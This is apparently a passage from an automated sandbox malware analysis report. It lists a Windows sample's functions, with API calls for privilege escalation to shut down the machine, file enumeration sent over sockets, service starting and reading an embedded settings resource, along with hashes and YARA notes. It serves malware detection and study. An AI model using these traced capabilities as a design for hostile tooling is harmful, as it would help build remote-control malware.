                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 010bd5c6ab87213fe13cad3c7d4c463c4a6ac2e7af963d8fc7983f8f2a6cfcc4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                                                                                                                                                                                                                                                                                                                              Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                                              • API String ID: 3534403312-3733053543
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                                                                                                                                                                                                                              Function 00452F10 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c9c150e801306c30e3e6fd676bf91ab99d53cd06d8b99a70f0bcb8a83e562639
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e307a384b629b95ff6fef94050d5be06a037bb5012f5a6d22b447047531b26ff
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9c150e801306c30e3e6fd676bf91ab99d53cd06d8b99a70f0bcb8a83e562639
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FC27071E046288FDB25CE28CD447EAB3B5EB44346F1441EBD84DE7242E778AE898F45
                                                                                                                                                                                                                                                                                                                              Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,007E5980,00000010), ref: 004042A5
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(0000028C,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(0000028C,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 4043647387-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ea1e12bf6d7b5bb0776437a1079a2271bc944b6e6ff07e0ed2060986cec02855
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea1e12bf6d7b5bb0776437a1079a2271bc944b6e6ff07e0ed2060986cec02855
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                                                                                                                                                                                                                                                                                                                              Function 100073F0 Relevance: 9.2, APIs: 6, Instructions: 215fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 1000744D
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(000000FF,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100075C9
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1000765E
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 10007665
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseFileFind$CreateFirstHandle
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3283578348-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 46a6c4569c05a4348eb0d03bbf47bdd66fa4ef082ca79d876ac5d41e30d8d319
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e7c7038f638e567c979eff5cb874745e3cf8d5b40648ff69d52a7e1f1d2920ba
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46a6c4569c05a4348eb0d03bbf47bdd66fa4ef082ca79d876ac5d41e30d8d319
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5781C370D00209EAFB10CFA4CC84BEEBBB9FF14394F610519E809E7294D775AA45CB61
                                                                                                                                                                                                                                                                                                                              Function 00419BD4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                                                                                                                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                                                                                                                                                                                                                                                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 276877138-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 50d0eb20569f235c126f5a3ccb9fed10f2149612a0ffcc28dffb27fdb097a1eb
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50d0eb20569f235c126f5a3ccb9fed10f2149612a0ffcc28dffb27fdb097a1eb
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                                                                                                                                                                                                                                                                                                                              Function 00418C79 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                                                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$Find$CreateFirstNext
                                                                                                                                                                                                                                                                                                                              • String ID: @CG$XCG$>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 341183262-3030817687
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3c09d01da1b6b9b6058f1ffbe336e4d098eaba070b435702f1eced19baeb6da2
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c09d01da1b6b9b6058f1ffbe336e4d098eaba070b435702f1eced19baeb6da2
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                                                                                                                                                                                                                              Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                                                                                                                                                                              • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                                                                                                                                                              • API String ID: 1589313981-1420736420
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3a14b14dbf802a9909642b009cac3fcba1cd868148fb9a957c36e01320ebba6d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a14b14dbf802a9909642b009cac3fcba1cd868148fb9a957c36e01320ebba6d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                                                                                                                                                                                                                                                                                                                              Function 004511F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 0045128C
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 004512B5
                                                                                                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,00451512,?,00000000), ref: 004512CA
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                                                                                                                                                                                                                                                                                                                              Function 0041A64F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                                                                                                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                                                                                                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                                                                                                                                                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                                                                                                              • String ID: SETTINGS
                                                                                                                                                                                                                                                                                                                              • API String ID: 3473537107-594951305
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                                                                                                                                                                                                                                                                                                                              Function 004513C7 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514D3
                                                                                                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                                                                                                                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,00443CFC,00000040,?,00443E1C,00000055,00000000,?,?,00000055,00000000), ref: 00451585
